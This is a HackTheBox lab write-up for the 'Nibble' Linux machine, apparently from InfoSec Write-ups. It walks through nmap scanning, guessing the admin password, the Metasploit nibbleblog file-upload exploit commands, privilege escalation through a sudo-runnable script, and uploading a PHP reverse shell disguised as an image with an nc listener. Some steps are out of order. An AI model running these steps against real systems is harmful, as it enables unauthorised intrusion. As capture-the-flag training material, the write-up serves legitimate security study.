A nibble is an easy machine, based on nimble blog vulnerability, using Metasploit we gain the initial shell, and after exploiting SUID we gain root on the machine.
Machine Author: mrb3n
Machine Type: Linux
Machine Level: 3.7/10
Scanning the Network
$namp -sC -sV 10.10.10.75
Page source of the port 80 gives us some hint about /nibbleblog directory.
Running Dirbuster on Port 80
Admin.php looks interesting, let's try to brute-force which some common used password.
Nibble blog is on 4.0.3 version lets try to find out if there is any vulnerability available.
Exploiting the Server
searchsploit nibbleblog 4.0.3
Let's use Metasploit to exploit the vulnerability.
msf5 > use exploit/multi/http/nibbleblog_file_upload
msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi nibbleblog
targeturi => nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
RHOSTS => 10.10.10.75
msf5 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
USERNAME => admin
msf5 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
PASSWORD => nibbles
msf5 exploit(multi/http/nibbleblog_file_upload) > exploit
$ find / -perm -u=s -type f 2>/dev/null
$ sudo -l
we can run the monitor.sh without using the password.
This file does not exist, however, so it is possible to create a simple bash script in its place to achieve root access.
STEP 1:- Find the PHP reverse shell.
I am using a Pentestmonkey reverse shell.
STEP 2:-Upload the PHP shell as and image.
STEP 3:-Setting up the reverse shell.
$nc -lnvp 4444
STEP 4:- Visit the image URL it will give back the reverse shell.
Thanks for reading! If you enjoyed this story, please click the ? button and share it to help others! Feel free to leave a comment ? below. Have feedback? Let’s connect on Twitter.
Follow Infosec Write-ups for more such awesome write-ups.
HackTheBox Write-up Nibble
InfoSec Write-ups – Medium